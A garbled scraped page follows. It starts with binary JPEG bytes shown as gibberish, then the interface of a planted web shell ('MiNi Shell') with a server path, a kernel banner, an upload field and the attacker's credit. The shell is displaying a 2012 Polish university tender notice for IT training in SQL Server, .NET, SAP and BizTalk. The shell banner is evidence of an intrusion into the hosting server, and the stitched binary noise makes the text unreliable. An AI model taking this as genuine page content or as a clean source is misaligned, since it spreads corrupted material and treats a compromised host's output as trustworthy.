JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120321/65209-N-2012.html

<p class="kh_header"><b>Warszawa: Przeprowadzenie pakietu szkoleń komputerowych z zakresu: projektowania i programowania baz, hurtowni danych oraz implementacji systemów klasy klient-serwer w technologii ADO.NET, ASP.NET, COM+, architektury i eksploatacji zintegrowanego systemu SAP oraz technologii integracyjnych MS BizTalk w ramach projektu - Zarządzanie transferem technologii informatycznej dla przedsiębiorstw.</b><br>
<b>Numer ogłoszenia: 65209 - 2012; data zamieszczenia: 21.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Główna Handlowa , Aleja Niepodległości 162, 02-554 Warszawa, woj. mazowieckie, tel. 022 5648608, faks 022 5648608.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sgh.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie pakietu szkoleń komputerowych z zakresu: projektowania i programowania baz, hurtowni danych oraz implementacji systemów klasy klient-serwer w technologii ADO.NET, ASP.NET, COM+, architektury i eksploatacji zintegrowanego systemu SAP oraz technologii integracyjnych MS BizTalk w ramach projektu - Zarządzanie transferem technologii informatycznej dla przedsiębiorstw..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie pakietu szkoleń komputerowych z zakresu: projektowania i programowania baz, hurtowni danych oraz implementacji systemów klasy klient-serwer w technologii ADO.NET, ASP.NET, COM+, architektury i eksploatacji zintegrowanego systemu SAP oraz technologii integracyjnych MS BizTalk w ramach projektu - Zarządzanie transferem technologii informatycznej dla przedsiębiorstw. 1.Usługi szkoleniowe będą realizowane w wymiarze 1560 godzin. Zakres tematyczny pakietu szkoleń komputerowych obejmuje zajęcia nt.: 1. Budowy i eksploatacji relacyjnych baz danych w środowisku systemu zarządzania bazami danych MS SQL 2008. 2) Budowy aplikacji analitycznych z wykorzystaniem hurtowni danych oraz narzędzi wspomagających wielowymiarową analizę danych klasy OLAP, MDX, DATAMINING w środowisku MS SQL 2008. 3) Budowy oprogramowania aplikacyjnego w architekturze klient - serwer ADO.NET, ASP.NET. 4) Budowy oprogramowania aplikacyjnego w architekturze wielowarstwowej COM+. 5) Integracji międzymodułowej, parametryzacji i kastomizacja zintegrowanego systemu informatycznego SAP. 6) Integracji systemów informatycznych z wykorzystaniem technologii MS BizTalk Server. Program, struktura oraz sylabusy poszczególnych szkoleń stanowić będą przedmiot negocjacji. Usługi szkoleniowe będą świadczone z podziałem na dwudniowe sesje szkoleniowe. Sesje szkoleniowe będą odbywały się w soboty i niedziele w godzinach 7.50-20.50. W ramach dwudniowej sesji szkoleniowej realizowanych będzie minimum 8 godzin zajęć 1 godzina = 60 min.. Miesięczny harmonogram szkoleń Zamawiający będzie przekazywał Wykonawcy do 25 dnia miesiąca poprzedzającego dany miesiąc pracy. Harmonogram szkoleń będzie określał: zakres tematyczny realizowanych w danym miesiącu szkoleń komputerowych oraz wymiar godzinowy sesji szkoleniowych z podziałem na poszczególne dni pracy. 2. Usługi techniczne związane z przygotowaniem dwóch pracowni komputerowych przed rozpoczęciem danej sesji szkoleniowej. Każda pracownia wyposażona jest w 21 komputerów stacjonarnych, pracujących w ramach lokalnej sieci komputerowej (łącznie 42 komputery stacjonarne klasy IBM PC 64bit. Zamawiający wymaga, aby pracownie komputerowe zostały przygotowane przez Wykonawcę w dzień poprzedzający daną sesję szkoleniowej tj. w piątek w godz. 10.00-20.00. Przygotowanie pracowni komputerowych obejmuje swoim zakresem: 1) Przeprowadzenie testów technicznych serwerów i stacji roboczych oraz infrastruktury sieciowej. 2) Instalację konfigurację i optymalizację pracy systemu operacyjnego Windows 2008 Server. 3) Konfigurację połączeń sieciowych oraz systemu kont i uprawnień uczestników szkolenia z wykorzystaniem technologii MS Windows Active Directory. 4) Instalację, konfigurację i optymalizację systemu zarządzania bazami danych MS SQL wraz z zestawem usług analitycznych MS Business Intelligence Studio. 5) Instalację, konfigurację i optymalizację pracy środowiska programistyczno - projektowego Visual Studio 2008 .NET wraz z MSDN. 6) Instalację konfigurację i optymalizację zintegrowanego systemu informatycznego SAP. 7) Instalację konfigurację i optymalizację oprogramowania MS BizTalk Server. Zamawiający przekaże Wykonawcy odpowiednie nośniki instalacyjne (1 komplet), zawierające: system operacyjny Microsoft Windows 2008 R2 Serwer, system zarządzania bazą danych Microsoft SQL Serwer wersja 2008 R2, pakiet programistyczny Visual Studio.NET wersja 2008, MSDN dla Visual Studio.NET, pakiet instalacyjny zintegrowanego systemu SAP oraz serwer integracyjny MS BizTalk 2006. Zamawiający gwarantuje sprawne działanie sprzętu komputerowego oraz sprzętu projekcyjnego. Zamawiający przekaże sprzęt komputerowy przygotowany do instalacji przez Wykonawcę w/w oprogramowania komputerowego. Dyski twarde poszczególnych stacji roboczych będą sformatowane w standardzie NTFS. Po zakończeniu dwudniowej sesji szkoleniowej, Wykonawca usunie zainstalowane oprogramowanie z poszczególnych stacji roboczych oraz dokona formatowania dysków twardych standardzie NTFS (pełne formatowanie). 3. Przeprowadzenie minimum 200 godzin konsultacji merytorycznych dla Uczestników szkoleń komputerowych. Liczba godzin konsultacji merytorycznych stanowić będzie przedmiot negocjacji. Konsultacje merytoryczne będą dotyczyć tematyki: projektowania i programowania baz, hurtowni danych oraz systemów klasy klient-serwer w technologii .NET, architektury i eksploatacji zintegrowanego systemu SAP oraz technologii integracyjnych MS BizTalk. Konsultacje merytoryczne będą odbywały się w dni powszednie (poniedziałek - piątek) w godzinach 10.00-.18.00. Konsultacje merytoryczne będą świadczone w wymiarze 2h (1 godzina = 60 min.) dzień. Miesięczny harmonogram konsultacji Zamawiający będzie przekazywał Wykonawcy do 25 dnia miesiąca poprzedzającego dany miesiąc pracy. 4. Opracowanie dwóch podręczników do realizowanych szkoleń komputerowych. Zamawiający wymaga, aby podręczniki zostały opracowane w języku polskim. Struktura, zawartość merytoryczna poszczególnych rozdziałów oraz układ tematyczny podręczników stanowić będą przedmiot negocjacji. Wykonawca przeniesie na Zamawiającego całość autorskich praw majątkowych do nieograniczonego w czasie i przestrzeni (w kraju i za granicą) korzystania i rozporządzania w/w Utworami oraz udzieli Zamawiającemu zgody na wykonywanie oraz zezwalanie osobom trzecim na wykonywanie autorskich praw zależnych do ww. Utworów, na wszystkich polach eksploatacji określonych w art. 50 ustawy o prawie autorskim i prawach pokrewnych. Zamawiający wymaga, aby podręczniki były na bieżąco aktualizowane i uzupełniane, a także dostosowane do nowych standardów i rozwiązań technologicznych SAP i Microsoft. Informacje dotyczące zakresu aktualizacji, zmian i uzupełnień podręczników, Zamawiający będzie przekazywał Wykonawcy do 25 dnia miesiąca poprzedzającego dany miesiąc pracy. 5. Opracowanie instrukcji stanowiskowych dla Słuchaczy w ramach realizowanego pakietu szkoleń komputerowych. Instrukcje stanowiskowe będą zwierały zdjęcia (tzw. print screen) ekranów konfiguracyjnych oraz sekwencyjny opis poszczególnych operacji, jakie należy wykonać w ramach realizowanych ćwiczeń laboratoryjnych. Zamawiający wymaga, aby instrukcje stanowiskowe zostały opracowane w języku polskim. Struktura, zawartość merytoryczna oraz układ tematyczny poszczególnych instrukcji stanowiskowych stanowić będą przedmiot negocjacji. Wykonawca przeniesie na Zamawiającego całość autorskich praw majątkowych do nieograniczonego w czasie i przestrzeni (w kraju i za granicą) korzystania i rozporządzania w/w Utworami oraz udzieli Zamawiającemu zgody na wykonywanie oraz zezwalanie osobom trzecim na wykonywanie autorskich praw zależnych do ww. Utworów, na wszystkich polach eksploatacji określonych w art. 50 ustawy o prawie autorskim i prawach pokrewnych. Zamawiający wymaga, aby instrukcje stanowiskowe były na bieżąco aktualizowane i uzupełniane, a także dostosowane do nowych standardów i rozwiązań technologicznych SAP i Microsoft. Informacje dotyczące zakresu aktualizacji, zamian i uzupełnień instrukcji stanowiskowych, Zamawiający będzie przekazywał Wykonawcy do 25 dnia miesiąca poprzedzającego dany miesiąc pracy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 28.05.33.10-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający zażąda od wykonawców zaproszonych do złożenia ofert wniesienia wadium, w wysokości 12 000,00 zł (dwanaście tysięcy złotych)..</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku usług okresowych lub ciągłych wykonał, co najmniej: 1) Jedną usługę polegającą na przeprowadzeniu, co najmniej 5 pakietów szkoleń komputerowych, obejmujących swoim zakresem, łącznie: projektowania baz, hurtowni danych, systemów klasy klient-serwer w technologii MS SQL i MS. NET i MS COM+ oraz integrację systemów informatycznych z wykorzystaniem technologii MS BizTalk. Zamawiający wymaga, aby w ramach w/w pakietów szkoleń zostało przeszkolonych, łącznie co najmniej 200 osób. Zamawiający wymaga, aby w/w usługi szkoleniowe były przeprowadzone na poziomie, co najmniej studiów podyplomowych lub doktoranckich. Wykonawca przedstawi dokumenty potwierdzające należyte wykonanie lub wykonywanie usług szkoleniowych. 2) Jedną usługę polegającą na wdrożeniu, audycie lub świadczeniu usług szkoleniowych z zakresu zintegrowanego systemu informatycznego SAP, o wartości nie mniejszej niż 200 000,00 zł brutto, oraz przedstawi dokumenty potwierdzające należyte ich wykonanie lub wykonywanie. 3) Jedną usługę o wartości minimum 100 000,00 zł brutto, polegającą na opracowaniu specjalistycznych materiałów dydaktycznych (prezentacje multimedialne, skrypty, ćwiczenia wraz z zestawem pytań, rozwiązań i odpowiedzi) do zajęć laboratoryjnych z zakresu baz i hurtowni danych, aplikacji internetowych, z wykorzystaniem rozwiązań technologicznych firmy Microsoft na poziomie, co najmniej studiów podyplomowych lub doktoranckich, oraz przedstawi dokumenty potwierdzające należyte ich wykonanie lub wykonywanie. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie złożonych oświadczeń i dokumentów wyszczególnionych w niniejszym głoszeniu o zamówieniu. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił. Nie wykazanie spełnienia warunku skutkować będzie wykluczeniem wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje, co najmniej dwiema osobami do realizacji przedmiotowej usługi, z których każda musi posiadać: 1. Wykształcenie wyższe. 2. Udokumentowaną znajomość technologii bazodanowych w środowisku SQL Server. 3. Udokumentowaną znajomość technologii wykorzystywanych w procesie budowy systemów analitycznych z wykorzystaniem hurtowni danych oraz narzędzi wspomagających wielowymiarową analizę danych klasy OLAP, MDX, DATAMINING w środowisku Microsoft SQL Server. 4. Udokumentowaną znajomość współczesnych metod, technik i narzędzi wspomagających proces budowy oprogramowania aplikacyjnego w architekturze klient - serwer ADO.NET, ASP.NET. 5. Udokumentowaną znajomość współczesnych metod, technik i narzędzi wspomagających proces budowy oprogramowania aplikacyjnego w architekturze wielowarstwowej COM+. 6. Udokumentowaną znajomość technologii wykorzystywanych w procesie budowy i wdrażania platformy integracji systemów informatycznych w środowisku MS Biz Talk. 7. Udokumentowaną znajomość metodyki prowadzenia projektów informatycznych firmy SAP. Ocena spełnienia warunku wymaganego od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie złożonych oświadczeń i dokumentów wyszczególnionych niniejszym ogłoszeniu. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił. Nie wykazanie spełnienia warunku skutkować będzie wykluczeniem wykonawcy z postępowania.
Zamawiający wymaga, aby certyfikaty potwierdzające, że każda z osób, którymi
dysponuje Wykonawca posiada kwalifikacje określone przez Zamawiającego     
stanowiły załączniki do Umowy, która zostanie zawarta pomiędzy Stronami.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 3.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Jeżeli liczba Wykonawców, którzy złożyli wniosek o dopuszczenie do udziału w postępowaniu i spełniają warunki udziału w postępowaniu nie przekroczy 3, Zamawiający zaprosi wszystkich Wykonawców, którzy spełniają warunki udziału w postępowaniu do złożenia ofert wstępnych. Jeżeli liczba Wykonawców będzie większa niż 3, Zamawiający zaprosi do składania ofert wstępnych Wykonawców, którzy otrzymali najwyższą ocenę spełniania warunków udziału w postępowaniu. Przy wyborze Wykonawców, którzy zostaną zaproszeni do składania ofert wstępnych Zamawiający będzie się kierował: 1) liczbą zrealizowanych przez Wykonawcę usług ujętych w wykazie wykonanych usług, przedstawionym przez Wykonawcę, spełniających warunki, o których mowa w pkt. IV 1. Ogłoszenia o zamówieniu, których należyte wykonanie zostało udokumentowane przez Wykonawcę (dokumenty potwierdzające należyte wykonanie usług) oraz 2) liczbą osób przeszkolonych przez Wykonawcę w ramach usług , ujętych w wykazie wykonanych usług, przedstawionym przez Wykonawcę, spełniających warunki, o których mowa w pkt. IV 1. Ogłoszenia o zamówieniu, których należyte wykonanie zostało udokumentowane przez Wykonawcę (dokumenty potwierdzający należyte wykonanie usług). Wybór Wykonawców zostanie przeprowadzony w sposób następujący: 1) za każdą kolejną usługę, powyżej wymaganej w pkt. IV 1 Wykonawca otrzyma 5 punktów, łącznie jednak nie więcej niż 15 punktów 2) za każde kolejne, powyżej wymaganych 200, przeszkolone 200 osób w ramach usługi określonej w pkt. IV 1 Wykonawca otrzyma 5 punktów, łącznie jednak nie więcej niż 25 punktów.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie Wykonawcy w przeprowadzeniu usług, spełniających warunki, o których mowa w pkt. IV 1 - 40</li>
<li>3 - Ocena merytoryczna przykładowych instrukcji stanowiskowych, które stanowić będą załączniki do Oferty Wstępnej Wykonawcy - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający określi w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sgh.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ---------------------.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2012 godzina 10:00, miejsce: Szkoła Główna Handlowa Aleja Niepodległości 162 , 02-554 Warszawa, Dział Zamówień Publicznych, w pokoju nr 419..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Projekt Zarządzanie transferem technologii informatycznej do przedsiębiorstw WND-POKL.02.01.01-00-057/1, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. 2. 2) Uwaga! Na stronie internetowej zamawiającego znajduje się wzór wniosku o dopuszczenie do udziału w postępowaniu wraz z wzorami załączników. -Druk wniosku, formularze oraz wymagane oświadczenia należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza. Pozostałe wymagane dokumenty należy składać w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę -Dopuszcza się podpisanie wniosku i ww. załączników przez pełnomocnika osób upoważnionych do reprezentowania wykonawcy. W takim przypadku jego upoważnienie musi być załączone do wniosku w oryginale lub kopii notarialnie poświadczonej. -W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty. -Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. -Wszystkie miejsca, w których naniesiono zmiany, powinny być czytelnie oznaczone i podpisane przez osoby upoważnione do reprezentowania wykonawcy...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com